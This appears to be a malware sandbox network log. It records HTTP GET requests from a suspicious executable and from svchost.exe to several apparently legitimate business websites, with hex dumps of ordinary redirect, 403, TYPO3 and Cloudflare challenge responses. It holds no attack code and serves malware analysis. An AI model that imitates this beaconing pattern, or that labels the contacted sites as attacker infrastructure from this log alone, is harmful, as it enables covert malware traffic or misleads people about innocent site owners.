                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC987INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      6192.168.2.550293188.114.96.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:30 UTC64OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: hyab.se
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:30 UTC64INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:44:30 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://hyab.com
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=600
                                                                                                                                                                                                                                                                                                      Expires: Wed, 22 Mar 2023 04:54:30 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q5LQ0TmKXsrv2c1hvG0GVp80Nir8PU6b6NIJqVCfF9xyEEp5iLcJOI5kElC%2ByHt2miBj3%2B0rugQh813wIN2bbY6PmWczjgrX3QhDtZihIntGbH%2FXQjkHDMof"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc7a12d0539d0-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:30 UTC65INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:30 UTC65INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      60192.168.2.521432138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC987OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC988INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:33 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 548
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC988INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      61192.168.2.5215675.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC990OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:33 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Content-Length: 51841
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1024INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC1040INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                                                      Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:34 UTC1056INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:34 UTC1072INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                                                      Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      62192.168.2.522849188.114.96.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1074OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: sigtoa.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1075INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:35 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3gCVoP9B2Ggka7QVCnWEt3ak7dXyw9AFN4mOOPCjD6O8EQEpiWQRege08cYek4AKcFuebLCwyFEVQHs3RsVRRvnOjZaoQ4330WPRQiWVyRs6bxDiORBsYgdNDaGG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc9385dfe2bce-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1076INData Raw: 31 65 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: 1e93<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible"
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1076INData Raw: 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div cl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1077INData Raw: 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 6f 79 72 2e 59 57 42 6a 62 34 45 34 49 7a 34 6d 49 69 35 6e 44 6b 4a 49 33 46 68 78 4e 43 56 38 73 6c 30 69 43 44 4a 4a 5a 31 4d 2d 31 36 37 39 34 36 30 33 33 35 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72
                                                                                                                                                                                                                                                                                                      Data Ascii: needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=oyr.YWBjb4E4Iz4mIi5nDkJI3FhxNCV8sl0iCDJJZ1M-1679460335-0-gaNycGzNCPs" method="POST" enctype="application/x-www-for
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1079INData Raw: 71 70 64 42 43 6c 33 4e 75 6e 61 44 34 78 2d 4b 34 44 42 32 77 52 4c 52 65 67 77 7a 73 50 4a 4a 54 34 67 64 64 6d 62 42 33 37 34 50 74 6a 49 41 54 66 32 46 52 4b 41 75 35 54 66 4c 42 72 72 55 47 6b 37 33 51 57 4e 56 58 4d 58 79 7a 47 53 7a 64 59 6c 38 76 50 41 56 72 46 41 66 45 36 68 4b 54 79 74 5f 47 75 46 62 4a 77 59 6f 4e 34 34 4a 6c 48 75 4b 36 72 70 4b 6e 69 4e 72 30 58 78 72 64 38 62 48 36 62 4e 76 69 47 49 7a 67 72 76 70 6d 4f 47 51 61 56 49 5f 58 43 79 73 58 37 52 54 5a 4e 7a 4a 67 51 5a 68 44 74 5f 38 32 69 72 55 54 39 62 33 68 76 73 76 39 37 69 38 4a 65 63 47 34 32 4c 74 6d 6a 76 49 31 39 51 57 6f 34 49 6a 65 49 70 54 58 6f 58 6b 64 2d 6c 38 7a 6c 56 5f 58 7a 33 74 39 44 5a 64 61 37 48 44 2d 5a 33 58 46 42 70 36 68 6c 30 50 77 4d 62 34 41 65 49
                                                                                                                                                                                                                                                                                                      Data Ascii: qpdBCl3NunaD4x-K4DB2wRLRegwzsPJJT4gddmbB374PtjIATf2FRKAu5TfLBrrUGk73QWNVXMXyzGSzdYl8vPAVrFAfE6hKTyt_GuFbJwYoN44JlHuK6rpKniNr0Xxrd8bH6bNviGIzgrvpmOGQaVI_XCysX7RTZNzJgQZhDt_82irUT9b3hvsv97i8JecG42LtmjvI19QWo4IjeIpTXoXkd-l8zlV_Xz3t9DZda7HD-Z3XFBp6hl0PwMb4AeI
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1080INData Raw: 20 20 20 20 20 20 20 20 63 5a 6f 6e 65 3a 20 27 73 69 67 74 6f 61 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 38 34 35 31 35 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 39 33 38 35 64 66 65 32 62 63 65 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 30 65 34 64 61 33 34 36 62 34 64 65 65 39 32 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6f 79 72 2e 59 57 42 6a 62 34 45 34 49 7a 34 6d 49 69 35 6e 44 6b 4a 49 33 46 68 78 4e 43 56 38 73 6c 30 69 43 44 4a 4a 5a 31 4d 2d 31 36 37 39 34 36 30 33 33
                                                                                                                                                                                                                                                                                                      Data Ascii: cZone: 'sigtoa.com', cType: 'managed', cNounce: '84515', cRay: '7abbc9385dfe2bce', cHash: '0e4da346b4dee92', cUPMDTk: "\/?__cf_chl_tk=oyr.YWBjb4E4Iz4mIi5nDkJI3FhxNCV8sl0iCDJJZ1M-167946033
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1081INData Raw: 20 6d 3a 20 27 6a 66 42 53 42 36 79 7a 46 6b 59 79 6c 64 59 6e 62 43 78 65 57 75 58 53 5a 38 44 53 77 68 34 4d 31 2b 64 4f 31 6a 2b 66 72 58 77 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 58 4d 53 79 41 6f 67 4b 67 4e 33 63 56 79 6e 53 55 59 47 31 59 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 64 6f 6b 62 41 41 6a 75 46 41 58 55 37 65 76 4b 30 43 36 75 59 77 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46
                                                                                                                                                                                                                                                                                                      Data Ascii: m: 'jfBSB6yzFkYyldYnbCxeWuXSZ8DSwh4M1+dO1j+frXw=', i1: 'XMSyAogKgN3cVynSUYG1Yg==', i2: 'dokbAAjuFAXU7evK0C6uYw==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cF
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1083INData Raw: 34 49 7a 34 6d 49 69 35 6e 44 6b 4a 49 33 46 68 78 4e 43 56 38 73 6c 30 69 43 44 4a 4a 5a 31 4d 2d 31 36 37 39 34 36 30 33 33 35 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b
                                                                                                                                                                                                                                                                                                      Data Ascii: 4Iz4mIi5nDkJI3FhxNCV8sl0iCDJJZ1M-1679460335-0-gaNycGzNCPs" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1083INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


